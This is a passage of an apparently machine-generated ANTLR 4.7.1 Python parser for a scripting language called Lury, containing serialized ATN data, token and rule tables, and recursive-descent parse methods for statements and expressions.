buf.write("\31\3\31\3\31\3\31\3\31\5\31\u0127\n\31\3\32\3\32\5\32")
buf.write("\u012b\n\32\3\32\3\32\3\33\3\33\3\33\5\33\u0132\n\33\3")
buf.write("\33\3\33\3\33\3\33\5\33\u0138\n\33\7\33\u013a\n\33\f\33")
buf.write("\16\33\u013d\13\33\3\34\3\34\5\34\u0141\n\34\3\34\3\34")
buf.write("\3\35\3\35\3\35\3\35\3\35\5\35\u014a\n\35\3\35\3\35\3")
buf.write("\35\3\35\3\35\3\35\5\35\u0152\n\35\3\35\3\35\5\35\u0156")
buf.write("\n\35\5\35\u0158\n\35\3\35\3\35\3\35\3\35\3\35\3\35\5")
buf.write("\35\u0160\n\35\3\35\3\35\3\35\3\35\3\35\3\35\3\35\3\35")
buf.write("\5\35\u016a\n\35\3\35\3\35\3\35\3\35\5\35\u0170\n\35\7")
buf.write("\35\u0172\n\35\f\35\16\35\u0175\13\35\3\35\2\17\20\24")
buf.write("\26\30\32\34\36 \"$*\648\36\2\4\6\b\n\f\16\20\22\24\26")
buf.write("\30\32\34\36 \"$&(*,.\60\62\64\668\2\5\3\2\4\21\4\2#%")
buf.write("+,\3\2:=\2\u0195\2>\3\2\2\2\4C\3\2\2\2\6E\3\2\2\2\bR\3")
buf.write("\2\2\2\nT\3\2\2\2\fV\3\2\2\2\16]\3\2\2\2\20_\3\2\2\2\22")
buf.write("m\3\2\2\2\24o\3\2\2\2\26\u0089\3\2\2\2\30\u0097\3\2\2")
buf.write("\2\32\u00a5\3\2\2\2\34\u00b0\3\2\2\2\36\u00bb\3\2\2\2")
buf.write(" \u00c6\3\2\2\2\"\u00d4\3\2\2\2$\u00e5\3\2\2\2&\u00f9")
buf.write("\3\2\2\2(\u0101\3\2\2\2*\u0103\3\2\2\2,\u0114\3\2\2\2")
buf.write(".\u011f\3\2\2\2\60\u0126\3\2\2\2\62\u0128\3\2\2\2\64\u012e")
buf.write("\3\2\2\2\66\u013e\3\2\2\28\u0157\3\2\2\2:=\7\67\2\2;=")
buf.write("\5\4\3\2<:\3\2\2\2<;\3\2\2\2=@\3\2\2\2><\3\2\2\2>?\3\2")
buf.write("\2\2?A\3\2\2\2@>\3\2\2\2AB\7\2\2\3B\3\3\2\2\2CD\5\6\4")
buf.write("\2D\5\3\2\2\2EJ\5\b\5\2FG\7\3\2\2GI\5\b\5\2HF\3\2\2\2")
buf.write("IL\3\2\2\2JH\3\2\2\2JK\3\2\2\2KN\3\2\2\2LJ\3\2\2\2MO\7")
buf.write("\3\2\2NM\3\2\2\2NO\3\2\2\2OP\3\2\2\2PQ\7\67\2\2Q\7\3\2")
buf.write("\2\2RS\5\n\6\2S\t\3\2\2\2TU\5\f\7\2U\13\3\2\2\2VW\5\16")
buf.write("\b\2W\r\3\2\2\2XY\5*\26\2YZ\t\2\2\2Z[\5\16\b\2[^\3\2\2")
buf.write("\2\\^\5\20\t\2]X\3\2\2\2]\\\3\2\2\2^\17\3\2\2\2_`\b\t")
buf.write("\1\2`a\5\22\n\2ag\3\2\2\2bc\f\4\2\2cd\7\22\2\2df\5\22")
buf.write("\n\2eb\3\2\2\2fi\3\2\2\2ge\3\2\2\2gh\3\2\2\2h\21\3\2\2")
buf.write("\2ig\3\2\2\2jk\7\23\2\2kn\5\22\n\2ln\5\24\13\2mj\3\2\2")
buf.write("\2ml\3\2\2\2n\23\3\2\2\2op\b\13\1\2pq\5\26\f\2q\u0086")
buf.write("\3\2\2\2rs\f\t\2\2st\7\24\2\2t\u0085\5\26\f\2uv\f\b\2")
buf.write("\2vw\7\25\2\2w\u0085\5\26\f\2xy\f\7\2\2yz\7\26\2\2z\u0085")
buf.write("\5\26\f\2{|\f\6\2\2|}\7\27\2\2}\u0085\5\26\f\2~\177\f")
buf.write("\5\2\2\177\u0080\7\30\2\2\u0080\u0085\5\26\f\2\u0081\u0082")
buf.write("\f\4\2\2\u0082\u0083\7\31\2\2\u0083\u0085\5\26\f\2\u0084")
buf.write("r\3\2\2\2\u0084u\3\2\2\2\u0084x\3\2\2\2\u0084{\3\2\2\2")
buf.write("\u0084~\3\2\2\2\u0084\u0081\3\2\2\2\u0085\u0088\3\2\2")
buf.write("\2\u0086\u0084\3\2\2\2\u0086\u0087\3\2\2\2\u0087\25\3")
buf.write("\2\2\2\u0088\u0086\3\2\2\2\u0089\u008a\b\f\1\2\u008a\u008b")
buf.write("\5\30\r\2\u008b\u0094\3\2\2\2\u008c\u008d\f\5\2\2\u008d")
buf.write("\u008e\7\32\2\2\u008e\u0093\5\30\r\2\u008f\u0090\f\4\2")
buf.write("\2\u0090\u0091\7\33\2\2\u0091\u0093\5\30\r\2\u0092\u008c")
buf.write("\3\2\2\2\u0092\u008f\3\2\2\2\u0093\u0096\3\2\2\2\u0094")
buf.write("\u0092\3\2\2\2\u0094\u0095\3\2\2\2\u0095\27\3\2\2\2\u0096")
buf.write("\u0094\3\2\2\2\u0097\u0098\b\r\1\2\u0098\u0099\5\32\16")
buf.write("\2\u0099\u00a2\3\2\2\2\u009a\u009b\f\5\2\2\u009b\u009c")
buf.write("\7\34\2\2\u009c\u00a1\5\32\16\2\u009d\u009e\f\4\2\2\u009e")
buf.write("\u009f\7\35\2\2\u009f\u00a1\5\32\16\2\u00a0\u009a\3\2")
buf.write("\2\2\u00a0\u009d\3\2\2\2\u00a1\u00a4\3\2\2\2\u00a2\u00a0")
buf.write("\3\2\2\2\u00a2\u00a3\3\2\2\2\u00a3\31\3\2\2\2\u00a4\u00a2")
buf.write("\3\2\2\2\u00a5\u00a6\b\16\1\2\u00a6\u00a7\5\34\17\2\u00a7")
buf.write("\u00ad\3\2\2\2\u00a8\u00a9\f\4\2\2\u00a9\u00aa\7\36\2")
buf.write("\2\u00aa\u00ac\5\34\17\2\u00ab\u00a8\3\2\2\2\u00ac\u00af")
buf.write("\3\2\2\2\u00ad\u00ab\3\2\2\2\u00ad\u00ae\3\2\2\2\u00ae")
buf.write("\33\3\2\2\2\u00af\u00ad\3\2\2\2\u00b0\u00b1\b\17\1\2\u00b1")
buf.write("\u00b2\5\36\20\2\u00b2\u00b8\3\2\2\2\u00b3\u00b4\f\4\2")
buf.write("\2\u00b4\u00b5\7\37\2\2\u00b5\u00b7\5\36\20\2\u00b6\u00b3")
buf.write("\3\2\2\2\u00b7\u00ba\3\2\2\2\u00b8\u00b6\3\2\2\2\u00b8")
buf.write("\u00b9\3\2\2\2\u00b9\35\3\2\2\2\u00ba\u00b8\3\2\2\2\u00bb")
buf.write("\u00bc\b\20\1\2\u00bc\u00bd\5 \21\2\u00bd\u00c3\3\2\2")
buf.write("\2\u00be\u00bf\f\4\2\2\u00bf\u00c0\7 \2\2\u00c0\u00c2")
buf.write("\5 \21\2\u00c1\u00be\3\2\2\2\u00c2\u00c5\3\2\2\2\u00c3")
buf.write("\u00c1\3\2\2\2\u00c3\u00c4\3\2\2\2\u00c4\37\3\2\2\2\u00c5")
buf.write("\u00c3\3\2\2\2\u00c6\u00c7\b\21\1\2\u00c7\u00c8\5\"\22")
buf.write("\2\u00c8\u00d1\3\2\2\2\u00c9\u00ca\f\5\2\2\u00ca\u00cb")
buf.write("\7!\2\2\u00cb\u00d0\5\"\22\2\u00cc\u00cd\f\4\2\2\u00cd")
buf.write("\u00ce\7\"\2\2\u00ce\u00d0\5\"\22\2\u00cf\u00c9\3\2\2")
buf.write("\2\u00cf\u00cc\3\2\2\2\u00d0\u00d3\3\2\2\2\u00d1\u00cf")
buf.write("\3\2\2\2\u00d1\u00d2\3\2\2\2\u00d2!\3\2\2\2\u00d3\u00d1")
buf.write("\3\2\2\2\u00d4\u00d5\b\22\1\2\u00d5\u00d6\5$\23\2\u00d6")
buf.write("\u00e2\3\2\2\2\u00d7\u00d8\f\6\2\2\u00d8\u00d9\7#\2\2")
buf.write("\u00d9\u00e1\5$\23\2\u00da\u00db\f\5\2\2\u00db\u00dc\7")
buf.write("$\2\2\u00dc\u00e1\5$\23\2\u00dd\u00de\f\4\2\2\u00de\u00df")
buf.write("\7%\2\2\u00df\u00e1\5$\23\2\u00e0\u00d7\3\2\2\2\u00e0")
buf.write("\u00da\3\2\2\2\u00e0\u00dd\3\2\2\2\u00e1\u00e4\3\2\2\2")
buf.write("\u00e2\u00e0\3\2\2\2\u00e2\u00e3\3\2\2\2\u00e3#\3\2\2")
buf.write("\2\u00e4\u00e2\3\2\2\2\u00e5\u00e6\b\23\1\2\u00e6\u00e7")
buf.write("\5&\24\2\u00e7\u00f6\3\2\2\2\u00e8\u00e9\f\7\2\2\u00e9")
buf.write("\u00ea\7&\2\2\u00ea\u00f5\5&\24\2\u00eb\u00ec\f\6\2\2")
buf.write("\u00ec\u00ed\7\'\2\2\u00ed\u00f5\5&\24\2\u00ee\u00ef\f")
buf.write("\5\2\2\u00ef\u00f0\7(\2\2\u00f0\u00f5\5&\24\2\u00f1\u00f2")
buf.write("\f\4\2\2\u00f2\u00f3\7)\2\2\u00f3\u00f5\5&\24\2\u00f4")
buf.write("\u00e8\3\2\2\2\u00f4\u00eb\3\2\2\2\u00f4\u00ee\3\2\2\2")
buf.write("\u00f4\u00f1\3\2\2\2\u00f5\u00f8\3\2\2\2\u00f6\u00f4\3")
buf.write("\2\2\2\u00f6\u00f7\3\2\2\2\u00f7%\3\2\2\2\u00f8\u00f6")
buf.write("\3\2\2\2\u00f9\u00fc\5(\25\2\u00fa\u00fb\7*\2\2\u00fb")
buf.write("\u00fd\5&\24\2\u00fc\u00fa\3\2\2\2\u00fc\u00fd\3\2\2\2")
buf.write("\u00fd\'\3\2\2\2\u00fe\u00ff\t\3\2\2\u00ff\u0102\5(\25")
buf.write("\2\u0100\u0102\5*\26\2\u0101\u00fe\3\2\2\2\u0101\u0100")
buf.write("\3\2\2\2\u0102)\3\2\2\2\u0103\u0104\b\26\1\2\u0104\u0105")
buf.write("\5.\30\2\u0105\u0111\3\2\2\2\u0106\u0107\f\6\2\2\u0107")
buf.write("\u0110\7+\2\2\u0108\u0109\f\5\2\2\u0109\u0110\7,\2\2\u010a")
buf.write("\u010b\f\4\2\2\u010b\u010c\7-\2\2\u010c\u010d\5,\27\2")
buf.write("\u010d\u010e\7.\2\2\u010e\u0110\3\2\2\2\u010f\u0106\3")
buf.write("\2\2\2\u010f\u0108\3\2\2\2\u010f\u010a\3\2\2\2\u0110\u0113")
buf.write("\3\2\2\2\u0111\u010f\3\2\2\2\u0111\u0112\3\2\2\2\u0112")
buf.write("+\3\2\2\2\u0113\u0111\3\2\2\2\u0114\u0115\5.\30\2\u0115")
buf.write("-\3\2\2\2\u0116\u0120\78\2\2\u0117\u0120\5\60\31\2\u0118")
buf.write("\u0120\7/\2\2\u0119\u0120\7\60\2\2\u011a\u0120\7\61\2")
buf.write("\2\u011b\u011c\7\62\2\2\u011c\u011d\5\f\7\2\u011d\u011e")
buf.write("\7\63\2\2\u011e\u0120\3\2\2\2\u011f\u0116\3\2\2\2\u011f")
buf.write("\u0117\3\2\2\2\u011f\u0118\3\2\2\2\u011f\u0119\3\2\2\2")
buf.write("\u011f\u011a\3\2\2\2\u011f\u011b\3\2\2\2\u0120/\3\2\2")
buf.write("\2\u0121\u0127\79\2\2\u0122\u0127\7>\2\2\u0123\u0127\t")
buf.write("\4\2\2\u0124\u0127\5\62\32\2\u0125\u0127\5\66\34\2\u0126")
buf.write("\u0121\3\2\2\2\u0126\u0122\3\2\2\2\u0126\u0123\3\2\2\2")
buf.write("\u0126\u0124\3\2\2\2\u0126\u0125\3\2\2\2\u0127\61\3\2")
buf.write("\2\2\u0128\u012a\7-\2\2\u0129\u012b\5\64\33\2\u012a\u0129")
buf.write("\3\2\2\2\u012a\u012b\3\2\2\2\u012b\u012c\3\2\2\2\u012c")
buf.write("\u012d\7.\2\2\u012d\63\3\2\2\2\u012e\u012f\b\33\1\2\u012f")
buf.write("\u0131\5\22\n\2\u0130\u0132\7\22\2\2\u0131\u0130\3\2\2")
buf.write("\2\u0131\u0132\3\2\2\2\u0132\u013b\3\2\2\2\u0133\u0134")
buf.write("\f\4\2\2\u0134\u0135\7\22\2\2\u0135\u0137\5\22\n\2\u0136")
buf.write("\u0138\7\22\2\2\u0137\u0136\3\2\2\2\u0137\u0138\3\2\2")
buf.write("\2\u0138\u013a\3\2\2\2\u0139\u0133\3\2\2\2\u013a\u013d")
buf.write("\3\2\2\2\u013b\u0139\3\2\2\2\u013b\u013c\3\2\2\2\u013c")
buf.write("\65\3\2\2\2\u013d\u013b\3\2\2\2\u013e\u0140\7\64\2\2\u013f")
buf.write("\u0141\58\35\2\u0140\u013f\3\2\2\2\u0140\u0141\3\2\2\2")
buf.write("\u0141\u0142\3\2\2\2\u0142\u0143\7\65\2\2\u0143\67\3\2")
buf.write("\2\2\u0144\u0145\b\35\1\2\u0145\u0146\5.\30\2\u0146\u0147")
buf.write("\7\66\2\2\u0147\u0149\5\22\n\2\u0148\u014a\7\22\2\2\u0149")
buf.write("\u0148\3\2\2\2\u0149\u014a\3\2\2\2\u014a\u0158\3\2\2\2")
buf.write("\u014b\u014c\7-\2\2\u014c\u014d\5.\30\2\u014d\u014e\7")
buf.write(".\2\2\u014e\u014f\7\66\2\2\u014f\u0151\5\22\n\2\u0150")
buf.write("\u0152\7\22\2\2\u0151\u0150\3\2\2\2\u0151\u0152\3\2\2")
buf.write("\2\u0152\u0158\3\2\2\2\u0153\u0155\78\2\2\u0154\u0156")
buf.write("\7\22\2\2\u0155\u0154\3\2\2\2\u0155\u0156\3\2\2\2\u0156")
buf.write("\u0158\3\2\2\2\u0157\u0144\3\2\2\2\u0157\u014b\3\2\2\2")
buf.write("\u0157\u0153\3\2\2\2\u0158\u0173\3\2\2\2\u0159\u015a\f")
buf.write("\b\2\2\u015a\u015b\7\22\2\2\u015b\u015c\5.\30\2\u015c")
buf.write("\u015d\7\66\2\2\u015d\u015f\5\22\n\2\u015e\u0160\7\22")
buf.write("\2\2\u015f\u015e\3\2\2\2\u015f\u0160\3\2\2\2\u0160\u0172")
buf.write("\3\2\2\2\u0161\u0162\f\7\2\2\u0162\u0163\7\22\2\2\u0163")
buf.write("\u0164\7-\2\2\u0164\u0165\5.\30\2\u0165\u0166\7.\2\2\u0166")
buf.write("\u0167\7\66\2\2\u0167\u0169\5\22\n\2\u0168\u016a\7\22")
buf.write("\2\2\u0169\u0168\3\2\2\2\u0169\u016a\3\2\2\2\u016a\u0172")
buf.write("\3\2\2\2\u016b\u016c\f\6\2\2\u016c\u016d\7\22\2\2\u016d")
buf.write("\u016f\78\2\2\u016e\u0170\7\22\2\2\u016f\u016e\3\2\2\2")
buf.write("\u016f\u0170\3\2\2\2\u0170\u0172\3\2\2\2\u0171\u0159\3")
buf.write("\2\2\2\u0171\u0161\3\2\2\2\u0171\u016b\3\2\2\2\u0172\u0175")
buf.write("\3\2\2\2\u0173\u0171\3\2\2\2\u0173\u0174\3\2\2\2\u0174")
buf.write("9\3\2\2\2\u0175\u0173\3\2\2\2,<>JN]gm\u0084\u0086\u0092")
buf.write("\u0094\u00a0\u00a2\u00ad\u00b8\u00c3\u00cf\u00d1\u00e0")
buf.write("\u00e2\u00f4\u00f6\u00fc\u0101\u010f\u0111\u011f\u0126")
buf.write("\u012a\u0131\u0137\u013b\u0140\u0149\u0151\u0155\u0157")
buf.write("\u015f\u0169\u016f\u0171\u0173")
return buf.getvalue()
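# Recursive-descent parser generated by ANTLR 4.7.1 from Lury.g4.
# It interprets the serialized ATN built above to drive its prediction decisions.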
class LuryParser ( Parser ):
grammarFileName = "Lury.g4"
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
sharedContextCache = PredictionContextCache()
literalNames = [ "<INVALID>", "';'", "'='", "'+='", "'-='", "'~='",
"'*='", "'/='", "'//='", "'%='", "'&='", "'|='", "'^='",
"'<<='", "'>>='", "'**='", "','", "'not'", "'>'", "'<'",
"'=='", "'<='", "'>='", "'!='", "'..'", "'...'", "'in'",
"'not in'", "'|'", "'^'", "'&'", "'<<'", "'>>'", "'+'",
"'-'", "'~'", "'*'", "'/'", "'//'", "'%'", "'**'",
"'++'", "'--'", "'['", "']'", "'true'", "'false'",
"'nil'", "'('", "')'", "'{'", "'}'", "':'" ]
symbolicNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "NEWLINE", "NAME", "STRING_LITERAL",
"DECIMAL_INTEGER", "OCT_INTEGER", "HEX_INTEGER", "BIN_INTEGER",
"FLOAT_NUMBER", "ID_FLAG", "SKIP_", "UNKNOWN_CHAR" ]
RULE_program = 0
RULE_statement = 1
RULE_simple_statement = 2
RULE_small_statement = 3
RULE_expression_statement = 4
RULE_expression = 5
RULE_assignment_expression = 6
RULE_comma_expression = 7
RULE_bool_not_expression = 8
RULE_comparison_expression = 9
RULE_range_expression = 10
RULE_in_expression = 11
RULE_or_expression = 12
RULE_xor_expression = 13
RULE_and_expression = 14
RULE_shift_expression = 15
RULE_addition_expression = 16
RULE_multiplication_expression = 17
RULE_power_expression = 18
RULE_unary_expression = 19
RULE_postfix_expression = 20
RULE_key_index = 21
RULE_primary = 22
RULE_literal = 23
RULE_list_literal = 24
RULE_list_element = 25
RULE_hash_literal = 26
RULE_hash_element = 27
ruleNames = [ "program", "statement", "simple_statement", "small_statement",
"expression_statement", "expression", "assignment_expression",
"comma_expression", "bool_not_expression", "comparison_expression",
"range_expression", "in_expression", "or_expression",
"xor_expression", "and_expression", "shift_expression",
"addition_expression", "multiplication_expression", "power_expression",
"unary_expression", "postfix_expression", "key_index",
"primary", "literal", "list_literal", "list_element",
"hash_literal", "hash_element" ]
EOF = Token.EOF
T__0=1
T__1=2
T__2=3
T__3=4
T__4=5
T__5=6
T__6=7
T__7=8
T__8=9
T__9=10
T__10=11
T__11=12
T__12=13
T__13=14
T__14=15
T__15=16
T__16=17
T__17=18
T__18=19
T__19=20
T__20=21
T__21=22
T__22=23
T__23=24
T__24=25
T__25=26
T__26=27
T__27=28
T__28=29
T__29=30
T__30=31
T__31=32
T__32=33
T__33=34
T__34=35
T__35=36
T__36=37
T__37=38
T__38=39
T__39=40
T__40=41
T__41=42
T__42=43
T__43=44
T__44=45
T__45=46
T__46=47
T__47=48
T__48=49
T__49=50
T__50=51
T__51=52
NEWLINE=53
NAME=54
STRING_LITERAL=55
DECIMAL_INTEGER=56
OCT_INTEGER=57
HEX_INTEGER=58
BIN_INTEGER=59
FLOAT_NUMBER=60
ID_FLAG=61
SKIP_=62
UNKNOWN_CHAR=63
def __init__(self, input:TokenStream, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.7.1")
self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)
self._predicates = None
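# Each grammar rule is represented below by a ParserRuleContext subclass plus
# a parse method of the same name.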
class ProgramContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def EOF(self):
return self.getToken(LuryParser.EOF, 0)
def NEWLINE(self, i:int=None):
if i is None:
return self.getTokens(LuryParser.NEWLINE)
else:
return self.getToken(LuryParser.NEWLINE, i)
def statement(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(LuryParser.StatementContext)
else:
return self.getTypedRuleContext(LuryParser.StatementContext,i)
def getRuleIndex(self):
return LuryParser.RULE_program
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterProgram" ):
listener.enterProgram(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitProgram" ):
listener.exitProgram(self)
def program(self):
localctx = LuryParser.ProgramContext(self, self._ctx, self.state)
self.enterRule(localctx, 0, self.RULE_program)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 60
self._errHandler.sync(self)
_la = self._input.LA(1)
while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << LuryParser.T__16) | (1 << LuryParser.T__32) | (1 << LuryParser.T__33) | (1 << LuryParser.T__34) | (1 << LuryParser.T__40) | (1 << LuryParser.T__41) | (1 << LuryParser.T__42) | (1 << LuryParser.T__44) | (1 << LuryParser.T__45) | (1 << LuryParser.T__46) | (1 << LuryParser.T__47) | (1 << LuryParser.T__49) | (1 << LuryParser.NEWLINE) | (1 << LuryParser.NAME) | (1 << LuryParser.STRING_LITERAL) | (1 << LuryParser.DECIMAL_INTEGER) | (1 << LuryParser.OCT_INTEGER) | (1 << LuryParser.HEX_INTEGER) | (1 << LuryParser.BIN_INTEGER) | (1 << LuryParser.FLOAT_NUMBER))) != 0):
self.state = 58
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [LuryParser.NEWLINE]:
self.state = 56
self.match(LuryParser.NEWLINE)
pass
elif token in [LuryParser.T__16, LuryParser.T__32, LuryParser.T__33, LuryParser.T__34, LuryParser.T__40, LuryParser.T__41, LuryParser.T__42, LuryParser.T__44, LuryParser.T__45, LuryParser.T__46, LuryParser.T__47, LuryParser.T__49, LuryParser.NAME, LuryParser.STRING_LITERAL, LuryParser.DECIMAL_INTEGER, LuryParser.OCT_INTEGER, LuryParser.HEX_INTEGER, LuryParser.BIN_INTEGER, LuryParser.FLOAT_NUMBER]:
self.state = 57
self.statement()
pass
else:
raise NoViableAltException(self)
self.state = 62
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 63
self.match(LuryParser.EOF)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class StatementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def simple_statement(self):
return self.getTypedRuleContext(LuryParser.Simple_statementContext,0)
def getRuleIndex(self):
return LuryParser.RULE_statement
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStatement" ):
listener.enterStatement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStatement" ):
listener.exitStatement(self)
def statement(self):
localctx = LuryParser.StatementContext(self, self._ctx, self.state)
self.enterRule(localctx, 2, self.RULE_statement)
try:
self.enterOuterAlt(localctx, 1)
self.state = 65
self.simple_statement()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Simple_statementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def small_statement(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(LuryParser.Small_statementContext)
else:
return self.getTypedRuleContext(LuryParser.Small_statementContext,i)
def NEWLINE(self):
return self.getToken(LuryParser.NEWLINE, 0)
def getRuleIndex(self):
return LuryParser.RULE_simple_statement
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSimple_statement" ):
listener.enterSimple_statement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSimple_statement" ):
listener.exitSimple_statement(self)
def simple_statement(self):
localctx = LuryParser.Simple_statementContext(self, self._ctx, self.state)
self.enterRule(localctx, 4, self.RULE_simple_statement)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 67
self.small_statement()
self.state = 72
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,2,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
self.state = 68
self.match(LuryParser.T__0)
self.state = 69
self.small_statement()
self.state = 74
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,2,self._ctx)
self.state = 76
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==LuryParser.T__0:
self.state = 75
self.match(LuryParser.T__0)
self.state = 78
self.match(LuryParser.NEWLINE)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Small_statementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def expression_statement(self):
return self.getTypedRuleContext(LuryParser.Expression_statementContext,0)
def getRuleIndex(self):
return LuryParser.RULE_small_statement
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSmall_statement" ):
listener.enterSmall_statement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSmall_statement" ):
listener.exitSmall_statement(self)
def small_statement(self):
localctx = LuryParser.Small_statementContext(self, self._ctx, self.state)
self.enterRule(localctx, 6, self.RULE_small_statement)
try:
self.enterOuterAlt(localctx, 1)
self.state = 80
self.expression_statement()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expression_statementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def expression(self):
return self.getTypedRuleContext(LuryParser.ExpressionContext,0)
def getRuleIndex(self):
return LuryParser.RULE_expression_statement
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpression_statement" ):
listener.enterExpression_statement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpression_statement" ):
listener.exitExpression_statement(self)
def expression_statement(self):
localctx = LuryParser.Expression_statementContext(self, self._ctx, self.state)
self.enterRule(localctx, 8, self.RULE_expression_statement)
try:
self.enterOuterAlt(localctx, 1)
self.state = 82
self.expression()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ExpressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
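# Labeled alternatives of the expression rules (presumably written with
# "# Label" annotations in Lury.g4) become dedicated context subclasses that
# copy their state from the base rule context.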
class AssignExpContext(ExpressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.ExpressionContext
super().__init__(parser)
self.copyFrom(ctx)
def assignment_expression(self):
return self.getTypedRuleContext(LuryParser.Assignment_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAssignExp" ):
listener.enterAssignExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAssignExp" ):
listener.exitAssignExp(self)
def expression(self):
localctx = LuryParser.ExpressionContext(self, self._ctx, self.state)
self.enterRule(localctx, 10, self.RULE_expression)
try:
localctx = LuryParser.AssignExpContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 84
self.assignment_expression()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Assignment_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_assignment_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class CommaExpContext(Assignment_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Assignment_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comma_expression(self):
return self.getTypedRuleContext(LuryParser.Comma_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCommaExp" ):
listener.enterCommaExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCommaExp" ):
listener.exitCommaExp(self)
class AssignContext(Assignment_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Assignment_expressionContext
super().__init__(parser)
self.op = None # Token
self.copyFrom(ctx)
def postfix_expression(self):
return self.getTypedRuleContext(LuryParser.Postfix_expressionContext,0)
def assignment_expression(self):
return self.getTypedRuleContext(LuryParser.Assignment_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAssign" ):
listener.enterAssign(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAssign" ):
listener.exitAssign(self)
def assignment_expression(self):
localctx = LuryParser.Assignment_expressionContext(self, self._ctx, self.state)
self.enterRule(localctx, 12, self.RULE_assignment_expression)
self._la = 0 # Token type
try:
self.state = 91
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,4,self._ctx)
if la_ == 1:
localctx = LuryParser.AssignContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 86
self.postfix_expression(0)
self.state = 87
localctx.op = self._input.LT(1)
_la = self._input.LA(1)
